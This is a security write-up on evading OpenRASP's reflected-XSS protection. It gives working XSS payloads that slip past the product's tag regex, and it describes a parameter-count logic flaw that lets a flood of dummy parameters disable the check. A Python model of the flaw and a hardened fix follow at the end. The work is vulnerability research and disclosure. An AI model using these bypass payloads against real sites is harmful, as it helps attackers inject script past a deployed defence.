By default, OpenRASP detects only reflected XSS; stored XSS is supported only by the commercial IAST product. For reflected XSS, OpenRASP can only detect controllable output points that sit outside an HTML tag, and that is the case this article bypasses. Controllable output inside a tag is essentially not detected by OpenRASP at all.


The test environment

Windows/tomcat/jdk1.8 / OpenRasp 1.3.7-beta

For deploying the test environment, see www.anquanke.com/post/id/241… or the official documentation.

In official.js, the xss_userinput algorithm is set to ignore by default; change it to block to enable interception. Clicking the following link from the official test cases triggers OpenRASP interception.


OpenRASP XSS algorithm

OpenRASP has two XSS algorithms. Algorithm 1 is for the PHP environment and is not considered here. Algorithm 2 is the user-input matching algorithm. According to its comment, the principle is: "when the user input is longer than 15 characters, matches the tag regex and appears in the response, intercept directly".

The tag regex, rendered with the Regexper website, reads as follows.

In general, the tag regex matches two cases: the request parameter value contains a tag name followed by a "/" or followed by a character in the range 0x00-0x20. So the following common XSS test payloads are intercepted:

<img src=1 onerror=alert()>    // the space matches 0x20 in the regex
<svg/onload=alert()>           // the "<svg/" part matches the regex

Both trigger interception:


Tag regex bypass

After collecting some XSS bypass payloads from the internet, I found that the following bypass the tag regex:

<d3v/onmouseleave=[1].some(confirm)>click
<d3/onmouseenter=[2].find(confirm)>z
<d3"<"/onclick="1>[confirm``]"<">z
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z

Entering the XSS payload directly in the browser returns a 400 response, so URL-encode every character of the payload.

Right-click "Copy URL" in the Burp Suite Repeater, open the copied URL in the browser, and click to trigger the pop-up.

Single or double quote after the tag name

Two more XSS payloads collected along the way also bypass the check:

<a"/onclick=(confirm)()>click
<a'/onclick=(confirm)()>click

A quick test of other tags followed by a single or double quote shows that most of them bypass as well.

<div" onclick=alert()>12</div>

For example, using 123 with a quote after the tag:

123'>

Constructing invalid tags

Invalid tag names can also bypass OpenRASP. Once you have seen this method, the earlier ones look much less appealing.

Payload:

<abc1 onclick=confirm()>click here

Verification:

or

<abcdefabcdefa onclick=confirm()>click here    // tag name longer than 12 characters

Program logic bypass

There is one more bypass, which works at the level of the program's detection logic.

The concrete OpenRASP XSS check lives in agent/java/engine/src/main/java/com/baidu/openrasp/plugins/checker/local/XssChecker.java. The following code implements "intercept user input that is longer than 15 characters, matches the tag regex, and appears in the response".

But the code contains an extra piece of logic. When the request carries multiple parameters, every parameter value that is longer than 15 characters and matches the tag regex above, but does not appear in the response, increments the variable count by 1. Once count exceeds 10, OpenRASP releases the request directly. Steering the program into the second box in the picture above therefore bypasses the check.

Bypass demo

Here a POST request is used so the payload is easy to read; converting it to a GET request with the parameter value URL-encoded gives the same result.

The original request triggers interception:

The bypass payload: several input[n] parameters are added before the input parameter, each carrying a different XSS payload as its value.

Converted to a GET request with the payload URL-encoded:

Bypass payload analysis

A constructed bypass payload must satisfy several requirements. First, there should in theory be at least 11 dummy request parameters, such as the input0 to input11 parameters used above; if that does not work, add a few more. Second, the dummy parameter values must meet certain requirements of their own. Third, the dummy parameter values must not be identical to the real parameter value.

In this case, the request parameters input0 to input11 come before the input parameter in parameterMap, as shown in the following figure.

So the input0 to input11 parameters are processed by the OpenRASP check logic first, the condition count > exceedLengthCount is hit, and the check is bypassed.
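To make the detection gap concrete, here is an added Python model of the logic described above, written for this article and not OpenRASP's own code: the regex is an approximation reconstructed from the description of the tag regex, the threshold names are assumptions, and the sample request is constructed. A hardened variant that evaluates every parameter before deciding is shown beside it.

```python
import re

# Approximation of the tag regex described above (assumption, not OpenRASP's
# exact pattern): a tag name of letters followed by "/" or a 0x00-0x20 byte.
TAG_RE = re.compile(r"<[A-Za-z]{1,12}[/\x00-\x20]")
MIN_LEN = 15               # input must be longer than this to be checked
EXCEED_LENGTH_COUNT = 10   # assumed name for the early-release threshold


def check_weak(params, response):
    """Model of the flawed logic: parameters are walked in order, and after
    more than EXCEED_LENGTH_COUNT non-reflected matches the request is
    released without looking at the remaining parameters."""
    count = 0
    for _name, value in params:
        if len(value) <= MIN_LEN or not TAG_RE.search(value):
            continue
        if value in response:
            return "block"
        count += 1
        if count > EXCEED_LENGTH_COUNT:
            return "pass"      # early release: later parameters are never checked
    return "pass"


def check_fixed(params, response):
    """Hardened variant: the reflection test is applied to every candidate
    parameter, so the order and number of dummy parameters do not matter."""
    for _name, value in params:
        if len(value) > MIN_LEN and TAG_RE.search(value) and value in response:
            return "block"
    return "pass"


# Constructed sample request: dummy parameters that match the regex but are
# not reflected, followed by the real parameter that the page echoes back.
REAL_VALUE = "<img src=1 onerror=alert()>"
DUMMIES = [("input%d" % i, "<svg/onload=alert(%d)>" % i) for i in range(12)]
SAMPLE_PARAMS = DUMMIES + [("input", REAL_VALUE)]
SAMPLE_RESPONSE = "<html><body>" + REAL_VALUE + "</body></html>"


def demo():
    """Returns (weak verdict, fixed verdict) for the constructed request."""
    return check_weak(SAMPLE_PARAMS, SAMPLE_RESPONSE), check_fixed(SAMPLE_PARAMS, SAMPLE_RESPONSE)


if __name__ == "__main__":
    print(demo())   # ('pass', 'block')
```

Note that the early exit in the weak model only misses the reflected value when the counter is pushed past the threshold before that parameter is reached, which is exactly why the dummy parameters have to precede the real one in parameterMap.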
